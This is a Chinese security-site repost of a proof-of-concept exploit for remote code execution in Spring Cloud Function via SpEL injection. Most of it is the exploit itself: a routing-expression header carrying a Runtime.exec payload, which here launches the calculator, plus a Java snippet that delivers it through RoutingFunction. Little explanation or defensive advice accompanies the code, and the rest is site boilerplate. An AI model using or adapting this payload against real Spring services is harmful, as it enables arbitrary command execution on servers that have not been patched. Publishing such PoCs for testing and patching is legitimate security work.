Spring Cloud Function SPEL RCE 漏洞利用

2022年3月30日10:05:06评论384 views字数 534阅读1分46秒阅读模式

点击上方蓝字“Ots安全”一起玩耍

spring-spel-0day-poc

这是 spring-cloud/spring-cloud-function Remote Code Exploit POC

spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("open -acalculator.app")

POC：

Function function = functionCatalog.lookup(RoutingFunction.FUNCTION_NAME);Message<String> message = MessageBuilder.withPayload("hello")         .setHeader(FunctionProperties.PREFIX + ".routing-expression",             "T(java.lang.Runtime).getRuntime().exec("open -a calculator.app")")         .build();function.apply(message);

Spring Cloud Function SPEL RCE 漏洞利用

原文始发于微信公众号（Ots安全）：Spring Cloud Function SPEL RCE 漏洞利用

左青龙
微信扫一扫

右白虎
微信扫一扫

本文由 admin 发表于 2022年3月30日10:05:06
转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出)：
Spring Cloud Function SPEL RCE 漏洞利用https://cn-sec.com/archives/855060.html

目录

在线咨询

13688888888

8888 QQ在线咨询

微信
本页二维码